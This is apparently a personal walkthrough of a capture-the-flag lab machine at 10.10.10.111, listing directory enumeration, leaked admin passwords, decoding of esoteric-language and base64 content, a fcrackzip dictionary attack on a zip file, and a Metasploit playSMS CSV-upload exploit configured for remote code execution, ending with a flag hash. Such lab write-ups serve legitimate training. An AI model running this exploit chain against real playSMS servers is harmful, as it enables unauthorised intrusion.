#10.10.10.111:9999
#PORT - 22(ssh), 9999(http), 139(samba- 3.x-4.x), 445(samba- 4.3) 

#nmap scan
#dirb
dirb http://10.10.10.111:9999
#dirb result= /admin , /backup , /dev/backup , /test

---------------------------------------------------------------
#passwd.txt and user.txt found in /backup
#USERNAME= admin    (for /admin login)
#PASSWD = imnothuman

---------------------------------------------------------------
#login page found in /admin
#view page source 
#go to = IP:9999/admin/js/login.js
#PASSWD= superduperlooperpassword_lol   (for /admin login)
#USERNAME= admin       (from /backup directory )

#after login into /admin
#esoteric language
#oak! to text (Google "brainfuck decoder")
>>>https://www.splitbrain.org/_static/ook/
#output after decoding= " Nothing here check /asdiSIAJJ0QWE9JAS " 

#go to IP:9999/asdiSIAJJ0QWE9JAS
wget http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS    (base64 content)
base64 -d asdiSIAJJ0QWE9JAS > decode
file decode
mv decode decode.zip   
#zip file is passwd protected so do dictionary attack
fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt decode.zip  => PASSWD: "password"
unzip decode.zip
#found index.php file
#it is hex-encoded
#after decoding through online hex-decoder -> base64 decode -> brainfuck decoder(Esoteric language)  ->  " idkwhatispass "


---------------------------------------------------------------
#new directory found in /dev/backup = /playsms
#login page found for playSMS in IP:9999/playsms
#PASSWD = idkwhatispass   (for /playsms login)
#USERNAME= admin     (from /backup  )

---------------------------------------------------------------
#exploit csv 
#search on searchsploit or metasploit
#metasploit  
use multi/http/playsms_uploadcsv_exec
set rhost 10.10.10.111
set targeturi /playsms
set rport 9999
set username admin 
set password idkwhatispass
set lhost <your_ip>

#inside /home/ayush

#key
2ab95909cf509f85a6f476b59a0c2fe0


